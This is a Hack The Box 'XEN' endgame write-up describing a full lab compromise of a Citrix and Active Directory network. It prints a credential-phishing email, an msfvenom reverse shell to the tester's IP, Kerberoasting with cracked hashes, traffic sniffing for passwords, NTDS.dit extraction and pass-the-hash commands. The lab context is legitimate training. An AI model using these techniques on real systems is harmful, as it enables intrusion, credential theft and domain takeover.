htb-endgame-xen

Hack the Box – XEN ( retired june 2020 )

1st I add the IP of the machine 10.13.38.12 to /etc/hosts as xen.htb

NMAP

As always we start with a nmap scan

E:\PENTEST>nmap -A -oN htb-endgame-xen 10.13.38.12
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-09 14:41 W. Europe Summer Time
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:42 (0:00:11 remaining)
Nmap scan report for humongousretail.com (10.13.38.12)
Host is up (0.024s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
25/tcp open smtp
| fingerprint-strings:
| GenericLines, GetRequest:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| sequence of commands
| sequence of commands
| Hello:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| EHLO Invalid domain address.
| Help:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| NULL:
|_ 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
| ssl-cert: Subject: commonName=humongousretail.com
| Subject Alternative Name: DNS:humongousretail.com
| Not valid before: 2019-03-31T21:05:35
|_Not valid after: 2039-03-31T21:15:35
|_ssl-date: 2020-04-09T12:42:58+00:00; +9s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.70%I=7%D=4/9%Time=5E8F182C%P=i686-pc-windows-windows%r(N
SF:ULL,33,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LO
SF:CAL\)\r\n")%r(Hello,55,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(E
SF:XCHANGE\.HTB\.LOCAL\)\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\
SF:r\n")%r(Help,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE
SF:\.HTB\.LOCAL\)\r\n211\x20DATA\x20HELO\x20EHLO\x20MAIL\x20NOOP\x20QUIT\x
SF:20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n")%r(GenericLines,6F,"220\x20
SF:ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x2
SF:0Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20c
SF:ommands\r\n")%r(GetRequest,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready
SF:\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose|phone
Running (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 24.00 ms 10.14.14.1
2 24.00 ms humongousretail.com (10.13.38.12)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.99 seconds

E:\PENTEST>

It seems we have HTTP and HTTPS on port 80 and 443, and SMTP on 25.

Overview of Web Services

Let’s take a quick look at the webpages to see what we have. I got the following on port 80, which redirected me to port 443, the certificate for the site provided and a new domain of hunongousretail.com.

I didn’t have much to go on, so I decided to do some directory enumeration.

Directory Enumeration

I used wfuzz in this case because gobuster didn’t come up with anything useful. wfuzz –hc 404 -w raft-small-words.txt http://10.13.38.12/FUZZ

Web Directories

We had several other directories that seemed interesting but the ones I wanted to look at are Remote and Jakarta.

Opening the https://hunongousretail.com/remote, I get the following.

And browsing https://hunongousretail.com/jakarta, I got the following.

I had a look at these for some time to see if I could come up with anything useful, I looked deeper into the directories and for known exploits for the XenAPP application.  Knowing this environment is called XEN, I decided to concentrate my efforts on the remote directory, rather than the Jakarta.  After spending some more time on this, I decided to investigate the SMTP service. I had done examples in the past where the users were very responsive.

SMTP Enumeration

I had the domain name of the company, therefore I decided to see if I could get any email addresses and see if I could somehow get a response from someone. smtp-user-enum -M RCPT -U ./usernames.txt -D humongousretail.com -t 10.13.38.12

I had found 4 addresses;

  • sales@humongousretail.com
  • it@humongousretail.com
  • marketing@humongousretail.com
  • legal@humongousretail.com

Now that I had these 4 addresses, I needed to ensure that I could send mail through.  I decided to use an internal address to try and get a response from someone.

User Response

To see if I was getting a response, I had a listener running to capture anything that may come through.

nc -nlvp 80

I then attempted a lot of different emails and a lot of different subjects.  I eventually got a hit with the subject of Remote.  My thoughts on this was to try and get the users to click on my link.  My thoughts were as follows;

telnet 10.13.38.12 25 helo humongousretail.com

MAIL FROM: it@hunongousretail.com

RCPT TO: sales@humongousretail.com

DATA Subject: Remote Portal Hi, The URL for the remote portal has now been changed to http://10.14.15.106 Regards

IT QUIT

I chose to do this because a mail from the IT department sent out to a group of people would hopefully get me something.  The users should trust an email coming in from IT, or so you would think.

Once the email had been sent, I didn’t get a response, but 30 seconds later, I had some data returned.  It was the user clicking on the link to the new portal and providing their credentials.

I had a username of pmorgan and a password of Summer1Summer!.  Although I knew that had worked, I tried again to ensure I had it correctly, and had a different user response.

I now had another user. This one being jmendes and password VivaBARC3L0N@!!!.

I kept this up to see if I could get any more responses and I had one more.

The last response I had gave me the user awardel and password @M3m3ntoM0ri@. I had 3 users

pmorgan:Summer1Summer! jmendes: VivaBARC3L0N@!!! awardel:@M3m3ntoM0ri@

Citrix XenAPP

I had the 3 users and knew that they must work somewhere.  I browsed to the remote site and entered the credentials of pmorgan

And I now had access to a desktop.

I tried this for each user that I had and each of the worked and successfully logged in.

I clicked on the Desktop to access and and was asked to open the launch.ica file which was defaulted to open with the Citrix Receiver Engine. after i installed icaclientWeb_19.12.0.19_amd64.deb on kali

Once I had click ok, I was presented with a Desktop.  I browsed to the Desktop of the user and I was presented with the 1st flag.

1 – XEN{wh0_n33d5_2f@?} Breach

Gaining a shell

Now that I had access to the desktops, I wanted to get a shell to see if I could elevate my privileges them.  I first made a note off all the users and desktops they were assigned to

I created the reverse shell that I wanted so that I could get a meterpreter session.

msfvenom –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.14.15.106 LPORT=10086 -f exe x86exploit.exe

I then proceeded to setup m msfconsole as follows.

 

Now that I had everything setup, I started the SimpleHTTPServer so that I could download the file necessary to exploit the system.

python -m SimpleHTTPServer 80

I then browsed to my machine on the vdesktop and downloaded the file.

I now started the exploit and got a meterpreter shell.

Privilege Escalation on Desktop

Now that I had a meterpreter shell, I wanted to see if I could elevate my privileges.  I decided to use the local exploit suggester.

I first put my session to the background and started the suggester. use post/multi/recon/local_exploit_suggester

Seeing the results from the suggester, I decided on using the always install elevated exploit. use exploit/windows/local/always_install_elevated

I had successfully raised my privileges.  I looked to see what was on the Administrator Desktop, and I had found the second flag.

2 – XEN{7ru573d_1n574ll3r5} Deploy

Further Enumeration

Now that I had a way into the inside of the network, I saw the internal network as 172.16.249.0/24, I wanted to perform a quick scan of the network to identify hosts. To pivot within the internal network, I used a socks proxy within msf. use auxiliary/server/socks4a

Now that I had done this, I wanted to see what hosts were live on the internal network.  Knowing the IP’s of the desktops, I chose to only scan a small range.  I wanted to scan between 199 and 210.

I managed to get an additional 3 IP’s.

  • 172.16.249.200 (DC)
  • 172.16.249.201 (Citrix)
  • 172.16.249.202 (NetScaler)

Because of this, I decided to use a technique I had used in a previous engagement called Kerberoasting.

With the system shell that I had earlier, I decided to upload the Kerberoasting module.

Further credentials

I now wanted to see if there were any further credentials that I could find

PS C:\Users\pmorgan\Desktop> .\Rubeus.exe kerberoast /outfile:service_ticket.txt


______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.4.2


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Searching the current domain for Kerberoastable users

[*] Found 1 user(s) to Kerberoast!

[*] SamAccountName : mturner
[*] DistinguishedName : CN=Mark Turner,OU=Contractors,DC=htb,DC=local
[*] ServicePrincipalName : MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Users\pmorgan\Desktop\service_ticket.txt

[*] Roasted hashes written to : C:\Users\pmorgan\Desktop\service_ticket.txt
PS C:\Users\pmorgan\Desktop> dir


Directory: C:\Users\pmorgan\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 4/4/2020 11:13 AM 7 cmd.bat
-ar-- 4/6/2019 11:11 PM 19 flag.txt
-a--- 2/20/2020 6:53 PM 41534 Invoke-Portscan.ps1
-a--- 3/26/2020 10:56 AM 16128568 netscan64.exe
-a--- 4/6/2020 8:57 PM 295 netscan64.lic
-a--- 4/6/2020 8:57 PM 39301 netscan64.xml
-a--- 2/20/2020 6:30 PM 770279 powerview-dev.ps1
-a--- 9/22/2019 10:20 AM 883600 putty.exe
-a--- 11/27/2019 2:17 PM 198144 Rubeus.exe
-a--- 4/6/2020 9:12 PM 2172 service_ticket.txt
-a--- 3/28/2020 11:17 AM 832512 SharpHound.exe
-a--- 3/28/2020 11:17 AM 973323 SharpHound.ps1
-a--- 4/6/2020 8:59 PM 32665 winPEAS.bat
-a--- 4/6/2020 8:59 PM 241152 winPEAS.exe

[to get a proper command prompt we us]
PS C:\Users\pmorgan\Desktop> type cmd.cmd
cmd.exe

PS C:\Users\pmorgan\Desktop> type service_ticket.txt 
$krb5tgs$23$*mturner$htb.local$MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433*$107F90C880956CA6ABBBAB4F9C2FB71B$15B748ACB9F233974753E8F01B946449197403730D59DB4B2D72E600B8C7AC5D3178F52A1C5562A1146824D2F33756CBF95D70EAC796B6F1D006FF6CF3DC1D1EA05B6E9839D67AA634F7B0FD24C1CE69F7CE49B5314CCFA49D074BEA3A457E5EEA9F91822E7F1676439ED137A54E5ADF1546A6AB5CA3B808EECC77A5F2E94880B39457CD714425340EA8DFE186B9A90BE5C541D990C6C7E0C82F95043A81DC85DF709CF7E45151B022EA8275C4ED2F0578F9462847F9E1CF21BEFBA5FB187A810DFAD7D2D62C04785842CBD44BB1B8AA94E9D9EFA691A8FF54392210C635E8B004C42E4F71EFF3EC30599A33F1F434A1705FF4378E553071A6A974FB58569CCFDE795E39492AD893BDBF55916EA6763D63C1CF476ABA8FC24790F8954C80B5503147681BDA02EB8A9DDE56DE33A266851AFC99E72A6E08C5CA6BD127EC9AAA3BD3AE026E94BD481FF3583A28C9A3CF408110C4FF8551A27E615A15F0125AAB8761E8D5B1DA35858BE845D031F253E46EBE6987A94D1A8848820511226F95C4F0E27798E575F179C06EBB12C76EEAFD4CA977E085A392B06EB805033A229C26504AA8EB871041346DAB4B92D5400B030C6CFA0EE853656F4AAAF857F04B30D0BF7376B37634CE0DD3D82B78A3005E5C3E174915960674AE255995A3B37AFC82944D87920BE43302DFF9EAC0D559298D943FAFFBA118DA31688858C415342B729949B6366B07F3A8AD9B3B310A73EB689C38A087C4E05D9917DC46E01B25C808B7A3F93449E1E5CD7CA02018EA77DD3E339BDDF6ACF4CCC991BDAFB45E9809F9C12CF9358C5D07ABFA105E90206EE59B7ED6D5161BA186AF275AEC9B046B0E600585750BC259FA108CD62A0CFF191F4A30EFEE4BAFECCE07F3BAC3A22055672F4E761D220D5F8E1CB4BD51FA5BDCC8CDA524A709A389A31E913174455592CE322BFD32E572A7DF97C599E05CC3771A4FA952B9C34B273AD284DF237187EDCEAF2922AFBE3C4927E67B2B5FEA3F9AB57AD47436031EDB5A8D4C5D31FACF307E8CAAD66D61D6760CA3B9A4EDF10B0F6315B9D3FA7F7118EC6AA446F4642883D7DAF016CB4F7F8F3DB305AD0F6CB087FA149B4C439EE164B6B809EFD1A2FABDD115D77B1371B06968C8E6479BFB94C51763EE71A064D445D28FE30EF81EE3FDDF437C495305913C30F4B99E749187F1C09DD3DC10DD39B23AD5A84BE8CA906D3C01770CD71291FBC43D3D2A61E0DBD651106BFE97B6F2DFFF1A70F0BC825BD68D3B791CD67211162BA7C021D606FA0AD46175FF04E785607F186885802F0305F04876A5657CE9DB0BAECEBA1F2593DC7C8B70B295DE3D0F47201CD149232DCBB303853A4042677C96F9E286A06A8AB54F3FAAE0B3DCF2D92D76F511FB11492364C8AF22AC6F0462E039D66F74025BB76BC870B94388D69FD1295DF592C6205B8871BD55FCC5429EDCB690719836

PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\SharpHound.ps1" .
PS C:\Users\pmorgan\Desktop> Set-ExecutionPolicy -Scope CurrentUser
PS C:\Users\pmorgan\Desktop> Bypass
PS C:\Users\pmorgan\Desktop> .\Sharphound
PS C:\Users\pmorgan\Desktop> Import-Module .\SharpHound.ps1
PS C:\Users\pmorgan\Desktop> get-help Invoke-BloodHound
PS C:\Users\pmorgan\Desktop> Invoke-BloodHound -CollectionMethod All
PS C:\Users\pmorgan\Desktop> copy .\service_ticket.txt \\Client\D$\
PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\netscan64.exe" .
PS C:\Users\pmorgan\Desktop>
PS C:\Users\pmorgan\Desktop> Import-Module .\powerview-dev.ps1
PS C:\Users\pmorgan\Desktop> Get-NetUser
PS C:\Users\pmorgan\Desktop> Get-NetUser | Ft samAccountName

I copied the contents of this token to a file named mturner so that I could now run this through hashcat.

I exhausted all password lists that I had with this and decided to look up some hashcat rules online to see what I could come up with.  I eventually came up with a ruleset that had potential which was found at https://github.com/NSAKEY/nsarules.git.

hashcat  -m 13100 ./mturner rockyou.txt rules/_NSAKEY.v2.dive.rule –debug-mode=1 –debugfile=matched.rule –force -0

After several hours, I eventually got a hit on the password.

We now know that the password for mturner is 4install!

SMB Access

Now that I had the new credentials I looked about a little more to see what else I could find.  I eventually found SMB on 172.16.249.201 and decided to use the credentials found to see if I could see anything. proxychains smbmap -u mturner -p ‘4install!’ -d htb.local -H 172.16.249.201

This showed that we had access to read the files locate in the Citrix$ folder.  I connected to this to see what was inside the folder with smbclient tools.

proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local

I was provided with some interesting files. The 2 of interest at this point are flag.txt and private.ppk.

I downloaded these file and was able to read the next flag.

3 – XEN{l364cy_5pn5_ftw} Ghost

Putty file Conversion

Now that I had a putty private key file, I had a look at its contents to see if I could get a hint at anything.

It seems this could be used in putty but has a password on it too.  I needed to try and crack the password on this before I could proceed.  I decided to convert this with putty2john. putty2john private.ppk > private.hash

Now that I had this file in a readable format for john, I tried to crack the password.

After several hours, all my password lists came up empty.  I was unable to crack the password with what I had.  I decided to look elsewhere to see what I could potentially use as a password list generator.  I found a password generator that seemed interesting and decided to run with it.  I found this at https://github.com/hashcat/kwprocessor 

./kwp -o passes basechars/tiny.base keymaps/en-gb.keymap routes/2-to-32-max-5-directionchanges.route

 

Once I had the password list generated, I then had to put it through john to try and crack it again. john -w=./passes private.hash

Now that I knew the password for the file, I could now convert the file for use with my system.  To do this, I used puttygen. puttygen private.ppk -O private-openssh -o id_rsa

I now had a key file that I could use.

Access to NetScaler

During the time gathering information, I had accumulated many user id’s and I tried all of them with the private key to get onto the SSH of the NetScaler.  I then quickly found the default username of the devices is nsroot.  I then attempted to login with this user id. proxychains ssh -i id_rsa nsroot@172.16.249.202

Now that I had access to the NetScaler as root of the device, I hunted around to see if I could find anything.  After a while of searching, I did not come up with anything useful.  Remembering that the device is essentially a firewall and router, I decided to listen to the traffic passing through the device and remembered a specific article at https://hackertarget.com/tcpdumpexamples/.

I attempted this to see if I would get any results. tcpdump -s 0 -A -n -l | egrep -I “POST /|pwd=|passwd=|password=|Host:”

 

4 – XEN{bu7_ld4p5_15_4_h455l3} Camouflage

LDAP

Knowing that I had access to this box as root, I wanted to perform some additional test to see what other potential traffic was being passed through it.  The previous flag seemed to suggest ldap could be being used. I set up a tcpdump to capture this for me. tcpdump -w capture.pcap

I now had to transfer the file back to my machine for investigation.  I used scp for this.

proxychains scp -i id_rsa nsroot@172.16.249.202:/root/capture.pcap .

I then opened this file within Wireshark to see what I could find.

Now going from the previous hint, I searched for the LDAP traffic and found a password.

The password that I had found was #S3rvice#@cc which was for the netscaler-svc account.

msf > use auxiliary/server/socks4a
msf > set srvport 8888
msf > route add 172.16.249.0 255.255.255.0 1
msf exploit
root@kali:~/htb/xen# proxychains GetUserSPNs.py -request -dc-ip 172.16.249.200 HTB.LOCAL/netscaler-svc:#S3rvice#@cc
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:389-<><>-OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon 
---------------------------------- ------- --------------------------------------- -------------------------- --------------------------
MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433 mturner CN=Deployment,OU=Groups,DC=htb,DC=local 2019-02-13 23:23:48.796612 2019-04-10 22:14:57.105936

|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
$krb5tgs$23$*mturner$HTB.LOCAL$MSSQLSvc/CITRIXTEST.HTB.LOCAL~1433*$30e2233e1b0123f3c7579d9f7a2384fb$08230b2c73edf5bc2afe0b13d494c385d67db84bc38ac830497f2e8eb1f2c148094dcd6f1cad0d26a896291119eb2a8cb196d388c568ce2348d4e69f16da74245af5298d42cf19c7958359f901d4a0f32ffb708e4ac037dd49411fce5e59ff58d6f3e184dcb7064b86c134bed4a6bf74af15875edd0800b464d3146559b62cadccd399484b4317f63aab2a9fe85ae08bfe4dece4ff25f040fa9de0c61f290670df1dd5b368a0c5b8c6e546bf547c6fbb63cb1bdf179d0eedb0ee37647a6a8e63d4a76b0e5d9f511e751cf8b4acfa4702aac9050a6e01496e4a4d26762805d950b27723d7e2a9831de5a8fdd78b8e480b16974ff4865114d74c1eee1715d5cd862afcff076f448c370c1b2ae0666770c00391c65384f525ff6f33210077e2b73cf0ae892352b3163fd0fde062e037adafbec57c705535d751efd0ecc31356cd8d933c29635107aa5add7043df5a20710a056869b872cb60203e7d7934574579837e01df2e57c580f4c6e19483c821bd5f533b378d43df50ad8fc6665bab80be7478462ccecca5208710a6b85b001ca602c2ab1920f6134ed5a59a27cd622ec2ffa6828ac4e65cb10b9d3dc5f61a50a7002ea737b41d9ffc603c0b54fe70764773468eced0d158a67ba15fe7c62083a01b447f5be2218a3ab6500378f69bacb34e6fcc1050320d9c965e75b188bf2d64ca89815b77220aa1300787e43fe9b0123447247b9ac82774c27425668d03930c48bde5cbb71d29b49d18c0473efb6a5707ca8498577b81f9a371b5fba0020699df3e0ad90566a9b366f731c98c2c1b1a454b0081aaf9d9074e69d3d0b47fcbf235b45d483bc37a0bb82f68623d6d2fd3d6bd43c2927bc713247fbcd5d492101b2b4f9b122b070897bae58d85730e5f718ad293401ea8fa9a9d691cf5e13c5187d91ed09ab4a2f5b57803e655e97145a7c0a9b371430d1f5e97e9f023f3a07ec587269758a6f2f2c2a58a2d8e61694c1950123edac23cbd9d007723d94b8542eef551a0459a50bed98f8a3d870bb8b55c2db8f12ed382fe9a4c5ed754eea8e14aa2c1b1cd15d3f2bed369071e2474eb93a0e9f9a2dfb986b25ed3459f5a956578d309fa74b6855beccdf7ba5e6facc63ebd1f6f251656b7756683582fe20e3b6cf669116df64ba68bd6beb3c09076a343f3f2b665b70d13ec65e18ddcea07bcae355517e1bdfb3bc2fc35542f08e9d29e5d1d047ecc04e4eed26bfbc8e397549820605811c7c154cfdd2650ee928d93fb770f55a84ce5ff864fbcb9e6a458f3b04c82d6d890315b0ae78227bea7ab43939d22466c27a8d8501eee6c7218dcdf772bde661302151ea644cfcc2576e8e462
root@kali:~/xen# proxychains smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201
ProxyChains-3.1 (http://proxychains.sf.net)
[+] Finding open SMB ports....
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
[+] User SMB session establishd on 172.16.249.201...
[+] IP: 172.16.249.201:445 Name: 172.16.249.201 
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
Citrix$ READ ONLY
IPC$ NO ACCESS
ISOs NO ACCESS
ISOs-TEST NO ACCESS
root@kali:~/xen#
root@kali:~/xen# proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local\\mturner
ProxyChains-3.1 (http://proxychains.sf.net)
WARNING: The "syslog" option is deprecated
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
Enter HTB.LOCAL\mturner's password: 4install!
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed May 8 18:12:51 2019
.. D 0 Wed May 8 18:12:51 2019
Deploying-XenServer-5.6.pdf A 997001 Tue Feb 12 18:21:10 2019
flag.txt AR 20 Sun Mar 31 11:25:10 2019
private.ppk A 1486 Wed May 8 18:21:51 2019
XenServer-5-6-SHG.pdf A 1747587 Tue Feb 12 18:21:32 2019

10485247 blocks of size 4096. 6344443 blocks available

Doppelganger

The term doppelganger is a non-biologically related look-alike (Wikipedia).  This provided me with the hint of looking back at the other accounts that were active on the domain.  I immediately got access to a shell again on the desktop and looked up domain details.

I was looking for what was hopefully an account that may seem to be like the found netscaler-svc account.

After all, I had tried this account in so many different places to access different resources and none were successful.

net user /domain

After a few attempts at usernames, I discovered that the backup-svc had the same password as the NetScaler password.  These essentially shared the same password.  This was out doppelganger. I then tried to login to the Domain controller using winrm and proxychains to see if I could get a successful access because I knew it was a member of the Backup Operators group which generally has access. proxychains ruby winrm_shell_with_upload.rb

 

root@kali:~/xen# proxychains ruby winrmshell2withupload.rb 
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:5985-<><>-OK
PS htb\backup-svc@DC Documents> 
PS htb\backup-svc@DC Desktop> type flag.txt
XEN{y_5h4r3d_p@55w0Rd5?} 
PS htb\backup-svc@DC Desktop>

I looked on the Desktop of backup-svc and found the next flag.

5 – XEN{y_5h4r3d_p@55w0Rd5?} Doppelganger

Privileges

Now that I was on the box, I wanted to see what privileges I had to understand what else could be achieved with simply logging in through WinRM. whoami /priv

This was sure interesting.  It seems I had a few privileges including the Backup and Restore.  This seemed obvious though with the account being named backup-svc.

I first tried to access the Administrator Desktop and was denied access.

From this I knew something had to be done with backup privileges.  I had recently done an exercise in the office that I work in on retrieving the Active Directory Database to extract the hashes.  This is something that I do on a regular basis and therefore knew I would have to create a shadow copy of the drive to even attempt to gain access to the NTDS.

I looked at all the usual methods of creating a shadow copy including vssadmin and wbadmin.  However, I then found an article which covered doing this with diskshadow.  This was highlighted in the following document. https://github.com/decoderit/whoamipriv

Hackinparis2019/blob/master/whoamiprivParis_Split.pdf.  I wanted to try and get RDP access to the machine and therefore setup a portfwd to give me access.

portfwd add -l 3389 -r 172.16.249.200 -p 3389

I then tried to open an RDP session to the machine using remmina.

I decided to utilise this to give myself hopefully a little more access proxychains xfreerdp ipv remmina

Install freerdp-x11

sudo apt-get install freerdp-x11
root@kali:~# proxychains xfreerdp /v:172.16.249.200 /u:backup-svc 
ProxyChains-3.1 (http://proxychains.sf.net)
[03:37:43:732] [6460:6461] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:3389-<><>-OK
Password: #S3rvice#@cc
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_RGB16
[03:37:58:120] [6460:6461] [INFO][com.winpr.clipboard] - initialized POSIX local file subsystem

And I was given the RDP access I was looking for.

I now decided to run through diskshadow to see if I could create a shadow of the drive.

Shadow Copies

Diskshadow
set context persistent nowriters
add volume c: alias dmwong
create expose %dmwong% z:

Once I had created the backup, I restore this by importing the  modules found at

https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Deb ug.

I opened PowerShell and imported the 2 modules.

Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit c:\temp\ndts.dit reg save hklm\system c:\temp\system.bak

Now that I had access to these files, I continued to download them onto my system for offline cracking.

Domain Admin

Now that I had these files offline I needed to extract the hashes. python /opt/impacket/examples/secretdump.py -ntds ndts.dit -system system.bak LOCAL

This provided me with all the hashes from the Active Directory Database.  Now that I had all of these hashes, I decided to use the ‘Pass the Hash’ method to try and gain access to the Domain controller as Administrator.

proxychains python /opt/impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be Administrator@172.16.249.200

6 – XEN{d3r1v471v3_d0m41n_4dm1n} Owned

Author – Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *